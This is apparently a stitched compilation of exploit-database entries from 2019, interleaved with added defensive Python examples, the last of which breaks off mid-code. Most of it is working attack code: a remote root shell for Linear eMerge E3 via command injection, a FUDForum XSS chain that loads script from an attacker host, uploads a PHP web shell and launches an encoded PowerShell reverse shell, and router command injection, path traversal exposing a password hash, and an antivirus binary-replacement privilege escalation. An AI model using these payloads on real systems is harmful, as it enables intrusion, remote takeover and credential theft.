# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
# Do you want me to try and get the web front-end credentials? (y/n) y
# ID='admin',Password='MakeLoveNotWar!'
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
# Software Version: 1.00.03
# Image: nxgcpub-image
# Built by: jenkins
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
#########################################################################

import requests
import time####
import sys#####
import os######
import re######

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
    # ASCII-art banner; the original line layout was lost in extraction
    print '''..... .e$$$$$$$$$$$$$$e. z$$ ^$$$$$$$$$$$$$$$$$. .$$$* J$$$$$$$$$$$$$$$$$$$e .$" .$$$$$$$$$$$$$$$$$$$$$$*- .$ $$$$$$$$$$$$$$$$***$$ .ee" z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*" " -\e$$ 4$$$$. .ze$$$"""" 4 z$$$$$ $$$$$$$$$$$$$$$$$$$$" $$$$$$$$ .$$$$$$$$$$$**$$$$*" z$$" $$ $$$$P*"" J$*$$c $$" $$F .$$$ $$ ^$$ $$ *$$c.z$$$ $$ $$ $P $$$$$$$ 4$F 4$ dP *$$$" $$ '$r .$ J$" $" $ $P 4$ F $$ 4$ 4$% 4$ $$ 4$ d$" $$ $P $$ $$ $$ 4$% $$ $$ $$ d$ $$ $F "3 r=4e=" ... ..rf . ""% $**$*"^""=..^4*=4=^"" ^"""'''
    print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
    print '\x20\x20[-] by lqwrm (c) 2019'
    print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
    sys.exit()

ipaddr = sys.argv[1]

creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
if creds.strip() == 'y':
    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
    showme = requests.get('http://'+ipaddr+'/test.txt')
    print showme.text

while True:
    try:
        cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
        execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
        #time.sleep(1);
        readreq = requests.get('http://'+ipaddr+'/test.txt')
        print readreq.text
        if cmd.strip() == 'exit':
            print "[+] Erasing read stage file and exiting..."
            requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
            print "[+] Done. Ba-bye!\n"
            break
        else:
            continue
    except Exception:
        break

sys.exit()
  17. # Exploit Title : FUDForum 3.0.9 - Remote Code Execution
# Date: 2019-10-26
# Exploit Author: liquidsky (JMcPeters)
# Vulnerable Software: FUDForum 3.0.9
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
# Version: 3.0.9
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
# Tested On: Windows / mysql / apache
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
# CVE: CVE-2019-18873

// Greetz : wetw0rk, Fr13ndz, offsec =)
//
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
// The areas impacted are the admin panel and the forum.
//
// XSS via username in Forum:
// 1. Register an account and log in to the forum.
// 2. Go to the user control panel. -> Account Settings -> change login
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
//
// XSS via user-agent in Admin Panel:
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
//

function patience() {
    var u=setTimeout("grabShell()",5000);
}

// This function is to call the reverse shell php script (liquidsky.php).
// currently using a powershell payload that will need to be modified.
function grabShell() { var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%
34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48
%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
    xhr = new XMLHttpRequest();
    xhr.open("GET", url, true);
    xhr.send(null);
}

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
    var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
    var fileName = "liquidsky.php";
    var url = "/fudforum/adm/admbrowse.php";
    var ctype = "application/x-php";
    var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
    var boundary = "-----------------------------9703186584101745941654835853";
    var fileSize = fileData.length;
    var body = "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
    body += currentdir + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
    body += token + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
    body += "Content-Type: " + ctype + "\r\n\r\n";
    body += fileData + "\r\n\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
    body += "1" + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
    body += fileName + "\r\n";
    body += "--" + boundary + "\r\n";
    body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
    body += "Upload File" + '\r\n';
    body += "--" + boundary + "--";
    xhr.send(body);
}

//Grab SQ token
var req = new XMLHttpRequest();
req.onreadystatechange=function() {
    if (req.readyState == 4 && req.status == 200) {
        var htmlPage = req.responseXML; /* fetch html */
        var SQ = htmlPage.getElementsByTagName("input")[0]
        submitFormWithTokenJS(SQ.value);
    }
}
req.open("GET", "/fudforum/adm/admuser.php", true);
req.responseType = "document";
req.send();
patience();
18. # Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: Luis Stefan
# Vendor Homepage: https://www.technicolor.com/
# Software Link: N/A
# Version: TC7300.B0 - STFA.51.20
# Tested on: macOS Mojave and Catalina
# CVE :

#!/usr/bin/env python3

__author__ = "Luis Stefan"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "[email protected]"
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""

from enum import IntEnum
from scapy.all import *
import codecs, sys, threading, time

# Define your network interface
interface = 'en0'
# Insert your interface card mac address
mac = 'xx:xx:xx:xx:xx:xx'
broadcast = 'ff:ff:ff:ff:ff:ff'
mac_hxd = codecs.decode(mac.replace(':', ''), 'hex')


class Bootp(IntEnum):
    Discover = 1
    Offer = 2
    Request = 3
    Decline = 4
    Ack = 5
    Nak = 6
    Release = 7


def dhcp_discover():
    # Broadcast a DHCPDISCOVER so the gateway answers with an OFFER
    disc_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'discover'), 'end'])
    sendp(disc_pkt, iface=interface)


def dhcp_request(pkt):
    # Answer the OFFER with a REQUEST whose hostname option carries the payload;
    # the gateway stores it and later renders it unencoded in its web UI
    yraddr = pkt['BOOTP'].yiaddr
    # gwaddr == Gateway Ip Address
    gwaddr = '192.168.0.1'
    hostname = "<script>alert('XSS triggered')</script>"
    req_pkt = Ether(src=mac, dst=broadcast) / \
        IP(src='0.0.0.0', dst='255.255.255.255') / \
        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
        DHCP(options=[('message-type', 'request'),
                      ('server_id', gwaddr),
                      ('requested_addr', yraddr),
                      ('hostname', hostname),
                      'end'])
    sendp(req_pkt, iface=interface)


def dhcp(pkt):
    pkt.show()
    print("#############################################################")
    if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
        dhcp_request(pkt)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
        print("Server Acknowledged")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
        print("Server Declined")
        sys.exit(0)
    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
        print("Server Nak")
        sys.exit(0)


def ver_dhcp():
    print("Verifying DHCP port traffic..")
    sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
    sys.exit(0)


def main():
    # Start the sniffer first so the OFFER is not missed, then send DISCOVER
    t1 = threading.Thread(target=ver_dhcp, args=())
    t1.daemon = True
    t1.start()
    time.sleep(2)
    dhcp_discover()


if __name__ == "__main__":
    main()
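The PoC above works because the gateway writes the DHCP client's hostname into its web pages without encoding it. The following Python is an added example, not code from the original post or from the vendor: it shows the two controls a gateway (or a defender reading its lease file) wants, a check that flags lease entries whose hostname is not RFC 1123-shaped, and a renderer that HTML-encodes every client-supplied field. The lease table is constructed for the example in the `expiry mac ip hostname client-id` layout that dnsmasq uses; that layout and the sample rows are assumptions, and the last row carries the payload from the PoC.

```python
import html
import re

# Constructed sample lease table (assumption: dnsmasq-style
# "expiry mac ip hostname client-id" rows); the last row carries the
# hostname payload from the PoC above.
SAMPLE_LEASES = """\
1573500000 aa:bb:cc:dd:ee:01 192.168.0.10 laptop-01 01:aa:bb:cc:dd:ee:01
1573500120 aa:bb:cc:dd:ee:02 192.168.0.11 * 01:aa:bb:cc:dd:ee:02
1573500300 aa:bb:cc:dd:ee:03 192.168.0.12 <script>alert('XSS triggered')</script> *
"""

# One RFC 1123 label: 1-63 letters/digits/hyphens, no leading or trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """True only for dot-separated RFC 1123 labels of at most 253 characters."""
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.rstrip(".").split("."))


def parse_leases(text: str) -> list:
    """Parse lease rows. Whitespace inside a hostname is rejoined so the
    original (suspicious) value survives for inspection instead of being
    split into bogus fields."""
    leases = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        expiry, mac, ip = fields[:3]
        leases.append({
            "expiry": int(expiry),
            "mac": mac,
            "ip": ip,
            "hostname": " ".join(fields[3:-1]),
            "client_id": fields[-1],
        })
    return leases


def suspicious_leases(leases: list) -> list:
    """Lease entries whose hostname could not have come from a well-behaved
    client. '*' is dnsmasq's marker for 'no hostname sent' and is not flagged."""
    return [l for l in leases
            if l["hostname"] != "*" and not is_valid_hostname(l["hostname"])]


def render_lease_rows(leases: list) -> str:
    """The sink done right: every client-controlled field is HTML-encoded,
    so a hostname can never close the <td> it is written into."""
    rows = []
    for l in leases:
        cells = (l["mac"], l["ip"], l["hostname"])
        rows.append("<tr>" + "".join(f"<td>{html.escape(c)}</td>" for c in cells) + "</tr>")
    return "\n".join(rows)


if __name__ == "__main__":
    leases = parse_leases(SAMPLE_LEASES)
    for bad in suspicious_leases(leases):
        print(f"suspicious hostname from {bad['mac']} ({bad['ip']}): {bad['hostname']!r}")
    print(render_lease_rows(leases))
```

Output encoding is the fix for the rendering bug; the hostname check is a detection aid, since a client that sends `<script>` in option 12 is not misconfigured, it is attacking.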
19. # Exploit Title: Technicolor TD5130.2 - Remote Command Execution
# Date: 2019-11-12
# Exploit Author: João Teles
# Vendor Homepage: https://www.technicolor.com/
# Version: TD5130v2
# Firmware Version: OI_Fw_V20
# CVE : CVE-2019-18396

---------------------------
POST /mnt_ping.cgi HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/mnt_ping.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Cookie: session=COOKIE
Connection: close
Upgrade-Insecure-Requests: 1

isSubmit=1&addrType=3&pingAddr=;ls&send=Send
20. # Title: gSOAP 2.8 - Directory Traversal
# Author: Numan Türle
# Date: 2019-11-13
# Vendor Homepage: https://www.genivia.com/
# Version : gSOAP 2.8
# Software Link : https://www.genivia.com/products.html#gsoap

POC
---------
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
HTTP/1.1 200 OK
Server: gSOAP/2.8
Content-Type: application/octet-stream
Content-Length: 51
Connection: close

root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
21. # Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
# Date: 2019-11-13
# Exploit Author: Riccardo Gasparini
# Vendor Homepage: https://www.fastweb.it/
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
# Version: 0.00.81
# Tested on: Linux
# CVE : N/A

import requests, json, time, sys

current_milli_time = lambda: int(round(time.time() * 1000))

password = 'XXXXXXXXXXXXXXX'
if password == 'XXXXXXXXXXXXXXX':
    print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
    sys.exit(-1)

# get XSRF-TOKEN
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Referer': 'http://192.168.1.254/tr069',
}
params = ()
response = requests.get('http://192.168.1.254', headers=headers)

# login request and get sessionKey
xsrfToken = response.cookies['XSRF-TOKEN']
cookies = {
    'XSRF-TOKEN': xsrfToken,
}
headers = {
    'Pragma': 'no-cache',
    'X-XSRF-TOKEN': xsrfToken,
    'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
    'Accept': 'application/json, text/plain, */*',
    'Referer': 'http://192.168.1.254/tr069',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'keep-alive',
    'Cache-Control': 'no-cache',
}
params = (
    ('_', str(current_milli_time())),
    ('cmd', '3'),
    ('nvget', 'login_confirm'),
    ('password', password),
    ('remember_me', '1'),
    ('sessionKey', 'NULL'),
    ('username', 'admin'),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
jsonResponse = json.loads(response.text)
sessionKey = jsonResponse["login_confirm"]["check_session"]

print("Executing command reboot\n")
# some commands as example are shown below in the mount parameter
params = (
    ('_', str(current_milli_time())),
    ('act', 'nvset'),
    ('service', 'usb_remove'),
    # Code execution
    # ('mount', '&ping -c 10 192.168.1.172&'),
    # ('mount', '&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),  # to enable SSH
    ('mount', '&reboot&'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(response.text)

# logout
params = (
    ('_', str(current_milli_time())),
    ('cmd', '5'),
    ('nvget', 'login_confirm'),
    ('sessionKey', sessionKey),
)
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
print(json.dumps(json.loads(response.text), indent=2))
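The TD5130.2 request in item 19 (`pingAddr=;ls`) and the Fastgate `mount=&reboot&` parameter above are the same defect: a form field is pasted into a shell command line, so shell metacharacters in it become commands. The Python below is an added example, not code from either vendor or from the exploit authors. It puts the string-concatenation pattern next to a handler that accepts only an IP literal or an RFC 1123 hostname and then runs ping as an argv list with no shell. The `ping -c` option assumes an iputils or BusyBox ping, and the four test inputs are taken from the two requests on this page.

```python
import ipaddress
import re
import subprocess

# Whole hostname: 1-253 chars of dot-separated RFC 1123 labels. Nothing in this
# alphabet (letters, digits, hyphen, dot) is special to sh, so ';', '&', '|',
# '`' and '$' cannot reach a shell even if one were used downstream.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(user_value: str) -> str:
    """The pattern both CGI handlers use: the field is concatenated into a shell
    line, so 'pingAddr=;ls' becomes 'ping -c 4 ;ls' and 'mount=&reboot&'
    turns into a command list. Returned as a string here; never execute it."""
    return "ping -c 4 " + user_value


def validate_target(value: str):
    """Return a canonical IP literal or the hostname itself, or None for
    anything else (including IP-looking strings with trailing junk)."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    return value if HOSTNAME_RE.match(value) else None


def build_ping_argv(user_value: str, count: int = 4) -> list:
    """argv for subprocess: the target is exactly one argument and is never
    re-parsed by a shell."""
    target = validate_target(user_value)
    if target is None:
        raise ValueError(f"rejected ping target {user_value!r}")
    return ["ping", "-c", str(int(count)), target]


def run_ping(user_value: str, timeout: float = 15.0) -> int:
    """Run ping without a shell; the timeout bounds how long one request can
    hold a worker. Returns the process exit status."""
    completed = subprocess.run(build_ping_argv(user_value), shell=False,
                               timeout=timeout, capture_output=True)
    return completed.returncode


if __name__ == "__main__":
    for candidate in ("192.168.1.172", "example.com", ";ls", "&reboot&"):
        print(f"{candidate!r:14} -> {validate_target(candidate)!r}")
```

Validation alone is not the fix, `shell=False` with an argv list is; the allowlist is there so that a value which fails it is logged as an attack rather than passed on to anything else.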
22. # Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
# Date: 2019-10-10
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://www.scanguard.com/
# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
# Version: 2020
# Tested on: Windows
# CVE : N/A
# Category: exploit

SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
https://www.scanguard.com

[Product]
ScanGuard Antivirus
ScanGuard_Setup.exe
Hash: 1a63c67a249da0c2e9abd09d35c3c65d

Complete Antivirus & Security Software

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
CVE-2019-18895

[Affected Product Code Base]
ScanGuard Antivirus - latest

[Affected Component]
Permissions on installation directory

[Attack Type]
Local

[Impact Code execution]
true

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Attack Vectors]
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.

[Reference]
https://support.scanguard.com/en/kb/22/upgrades-available

[Security Issue]
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to privilege escalation via a Trojan horse executable file.

The product sets weak access control restrictions, as permissions are set to Full Control for the Everyone group. This can allow low integrity malware the ability to replace ScanGuard executables.
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F

[Exploit/POC]

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP PoC By hyp3rlinx */

BOOL PWNED = FALSE;

BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){
    /* First run: move the real ScanGuard.exe aside (possible because Everyone has Full control) */
    if(!FileExists(DISABLED_TARGET)){
        rename(TARGET, DISABLED_TARGET);
        printf("[+] ScanGuard Antivirus EoP PoC\n");
        Sleep(300);
        printf("[+] Disabled ScanGuard.exe ...\n");
        Sleep(300);
    }else{
        /* Second run: we are already executing from the ScanGuard.exe path */
        PWNED = TRUE;
    }

    char fname[MAX_PATH];
    char newLoc[] = TARGET;
    DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);

    if (size){
        if(!PWNED){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(300);
            CopyFile(fname, newLoc, FALSE);
            printf("[+] Replaced legit ScanGuard...\n");
            Sleep(300);
            printf("[+] Done!\n");
            Sleep(300);
            MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
            Sleep(2000);
            exit(0);
        }else{
            if(FileExists("ScamGuard.lnk")){
                system("DEL /f ScamGuard.lnk");
            }
            printf("[+] ScamGuard PWNED!!!");
            printf("[+] By hyp3rlinx\n");
            system("pause");
        }
    }
    return 0;
}

[Disclosure Timeline]
Vendor Notification: September 16, 2019
Received vendor acknowledgement: September 16, 2019
Second contact follow up: September 29, 2019
No more vendor replies.
November 12, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
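The icacls listing in the advisory is the whole finding: `Everyone` and `BUILTIN\Users` hold Full control (`F`) on the install directory with `(OI)(CI)` inheritance, so any local user can replace the binaries. The Python below is an added example, not part of the advisory: it parses icacls output of that shape and flags ACEs that grant write rights to principals every local user belongs to, which is the check to run across `Program Files` when auditing a fleet. The sample listing is constructed to mirror the advisory's; the low-privilege principal list and the set of write-capable rights abbreviations are assumptions based on the documented icacls codes.

```python
import re

# Constructed icacls output modelled on the advisory's listing. The first line
# carries the path, continuation lines are indented, and the trailing summary
# line must be ignored.
PATH = r"C:\Program Files (x86)\ScanGuard\bins"
SAMPLE_ICACLS = r"""C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
                                      Everyone:(OI)(CI)(ID)F
                                      NT SERVICE\TrustedInstaller:(ID)F
                                      NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                      NT AUTHORITY\SYSTEM:(ID)F

Successfully processed 1 files; Failed processing 0 files
"""

# principal:(inheritance flags)rights, where rights is a simple code (F, M, RX,
# R, W, D, N) or a parenthesised list of granular rights such as (RX,W).
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<inherit>(?:\([A-Z]+\))*)"
                    r"(?P<rights>[A-Z]+|\([A-Z,]+\))$")

# Groups a non-privileged (or low-integrity) process is a member of (assumption).
LOW_PRIV = {"everyone", r"builtin\users",
            r"nt authority\authenticated users", r"nt authority\interactive"}
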